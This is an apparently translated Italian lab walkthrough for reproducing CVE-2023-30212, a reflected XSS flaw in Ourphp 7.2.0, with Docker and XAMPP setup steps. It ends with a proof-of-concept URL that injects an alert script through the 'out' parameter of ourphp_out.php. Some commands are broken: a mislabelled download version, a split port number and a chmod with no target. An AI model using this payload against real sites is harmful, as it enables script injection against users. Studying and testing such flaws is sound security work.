
Guida passo-passo all'exploit per CVE-2023-30212, una vulnerabilità XSS in Ourphp 7.2.0, con configurazione Docker e dimostrazione di iniezione di payload.
Sfruttando la vulnerabilità in Ourphp versione 7.2.0 anche chiamata CVE 2023 30212
Passo 1. Scarica e installa Docker sul tuo sistema (Nota). Sto usando Docker perché è veloce e facile per installare Ubuntu.
Passo 2. Configura l'ambiente Docker
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
Passo 3. Installa web server, PHP e MySQL. Installerò il server XAMPP per questo.
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
Passo 4. Scarica Ourphp versione 7.2.0
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
Passo 5. Configura Ourphp sul browser Apri il tuo browser e inserisci localhost o 127.0.0.1 Segui le istruzioni e installa Ourphp.
Passo 6. Sfruttare la vulnerabilità La versione 7.2.0 di Ourphp ha una vulnerabilità XSS (Cross-Site Scripting). Per mitigare la vulnerabilità nel file /client/manage/ourphp_out.php che permette l'esecuzione di codice XSS,
è necessario modificare il codice. La vulnerabilità si presenta quando il parametro "ourphp_admin" è impostato su "logout", e la variabile controllabile "out" viene stampata.
Gli attaccanti possono sfruttare questo iniettando un payload come "".
Codice: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
